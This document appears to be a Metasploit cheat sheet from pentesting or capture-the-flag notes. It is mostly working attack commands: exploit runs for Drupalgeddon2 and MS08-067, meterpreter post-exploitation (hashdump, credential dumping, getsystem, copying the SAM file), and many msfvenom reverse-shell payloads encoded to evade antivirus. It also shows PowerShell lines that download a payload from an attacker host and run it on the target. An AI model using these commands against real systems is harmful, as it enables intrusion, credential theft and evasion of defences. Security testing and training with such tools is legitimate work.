# Metasploit

Metasploit is an open-source pentesting framework maintained by Rapid7 and used by security engineers around the world.
# Basics

```
msfconsole                   # start metasploit
msf6 > db_status             # verify metasploit is connected to the database
msf6 > help                  # list commands
msf6 > search CVE-2014-6287  # search for a module
msf6 > use 0                 # use the first search result
msf6 > options               # look at the module options
```
# Usage

```
db_nmap -sV 10.10.10.10   # built-in nmap; results are stored in the database
hosts                     # see what hosts are in the database
services                  # get information about services in the database
vulns                     # get information about vulnerabilities
search EXPLOIT/NAME       # search for an exploit
use EXPLOIT_NAME          # use an exploit
use N                     # easier: use the number shown next to the module in the search results
set RHOSTS 10.10.10.10    # set the target hosts
set LHOST 10.10.10.10     # set the local host for things like reverse shells
show payloads             # some exploits have no default payload, so you need to pick one
set payload 5             # set the payload (by number from the list above)
show targets              # show targets
set target 2              # set the target as applicable
exploit                   # run the exploit
run -j                    # run the exploit as a background job
jobs                      # check on the status of jobs
options                   # if the exploit fails, double-check options like LHOST and RHOSTS
sessions -i 1             # bring session 1 to the foreground
```
# Post exploitation

# Upgrading shell to meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.

Background the shell by pressing Ctrl+Z, then:

```
msf6 > search shell_to_meterpreter
msf6 > use 0
msf6 post(multi/manage/shell_to_meterpreter) > set session 1   # or whichever session you want to upgrade
msf6 post(multi/manage/shell_to_meterpreter) > exploit
```
Meterpreter gives you commands for enumeration, file transfer, privilege escalation and pivoting:

```
sysinfo                              # OS and architecture; very handy when searching for exploits
ps                                   # look at running processes
upload winPEAS.bat                   # upload a file
upload file c:\\windows              # upload a file to c:\windows
download c:\\windows\\repair\\sam /tmp   # download a file to /tmp
execute -f cmd -c                    # start a command shell
cd "c:\program files (x86)"          # use quotes for paths with spaces
shell                                # get a shell on the target
powershell_shell                     # get a PowerShell shell on the target
getsystem                            # get SYSTEM on the target
hashdump                             # attempt to dump the hashes on the target
credcollect                          # attempt to dump creds
portfwd add -l 3389 -p 3389 -r $IP    # create a port forward to the target machine
portfwd delete -l 3389 -p 3389 -r $IP # delete the port forward
search -f *.xlsx                     # search for Excel files on the target machine
getuid                               # get the user id
```
# Drupalgeddon Example

```
msf6 > use unix/webapp/drupal_drupalgeddon2
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 10.10.10.233
rhost => 10.10.10.233
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 80
rport => 80
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 10.10.14.14
lhost => 10.10.14.14
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 10.10.14.14:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 10.10.10.233
[*] Meterpreter session 1 opened (10.10.14.14:4444 -> 10.10.10.233:42520)
```
# msfvenom reverse shell

A staged payload consists of two main components: a small stub loader and the final-stage payload. When you deliver windows/shell/reverse_tcp to the target machine, for example, you are actually sending the loader first. When that loader executes, it asks the handler (on the attacker's end) to send over the final stage (the larger payload), and then you get a shell.

A single (stageless) payload is a fire-and-forget kind of payload: the whole thing is delivered at once. This can be used when the target has no network access. x86/shikata_ga_nai is an encoder intended to keep AV from triggering on the file.
# Staged Example

On the local machine:

```
# create the staged reverse shell; LHOST/LPORT must match the handler below
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.10.10 LPORT=8080 -f exe -o revshell.exe
# set up a simple web server to serve it
python3 -m http.server 80
# set up the metasploit handler
msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0   # interface name; it must resolve to the LHOST baked into revshell.exe
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.13.20.31:8080
```

On the remote machine:

```
# download the reverse shell
powershell -c "Invoke-WebRequest -Uri 'http://10.10.10.10:80/revshell.exe' -OutFile 'c:\windows\temp\revshell.exe'"
# run the reverse shell on the target
c:\windows\temp\revshell.exe
```
# Stageless Example

```
# create a stageless x64 meterpreter executable
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f exe -o shell-x64.exe
# or, alternatively, a stageless x86 meterpreter executable
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f exe -e x86/shikata_ga_nai -o shell-x86.exe
# set up the metasploit handler
msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter_reverse_tcp       # x86
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter_reverse_tcp   # or x64, depending on the architecture you built
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.13.20.31:443
```

On the remote machine:

```
# download the reverse shell (shell-x64.exe or shell-x86.exe, matching the handler payload)
powershell -c "Invoke-WebRequest -Uri 'http://10.10.10.10:80/shell-x64.exe' -OutFile 'c:\windows\temp\shell-x64.exe'"
# run the reverse shell on the target
c:\windows\temp\shell-x64.exe
```
# msfvenom reverse shell examples

```
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php
# Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war
# Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
# FreeBSD x64 reverse shell
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf
# Linux C reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c
# Windows non-staged (stageless) reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe
# Windows staged (Meterpreter) reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
# Windows Python reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py
# Windows ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp
# Windows ASP Meterpreter reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f asp -e x86/shikata_ga_nai -o shell.asp
# Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx
# Windows JavaScript reverse shell with an 18-byte NOP sled
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18
# Windows PowerShell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
# Windows reverse shell excluding bad characters
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai
# Windows x64 reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe
# Windows reverse shell embedded into plink
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
```
# Catching a meterpreter_reverse_http callback

```
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_http
set LHOST 10.10.10.10
set LPORT 80
exploit
```

The handler now waits for an incoming connection.
# Installing

You may need to install Metasploit on a box: https://information.rapid7.com/metasploit-framework.html

```
msfdb init   # initialize and start the database used by msfconsole
```
# metasploit ms08-067

```
search ms08 067
use windows/smb/ms08_067_netapi
set LHOST tun0
set RHOST 10.10.10.10
show targets                    # list targets; matters if automatic targeting doesn't work
set Target 0                    # Auto Detect
show payloads
set payload windows/shell_reverse_tcp
set SMB::AlwaysEncrypt false    # required to work with msf6
set SMB::ProtocolVersion 1      # required to work with msf6
exploit
```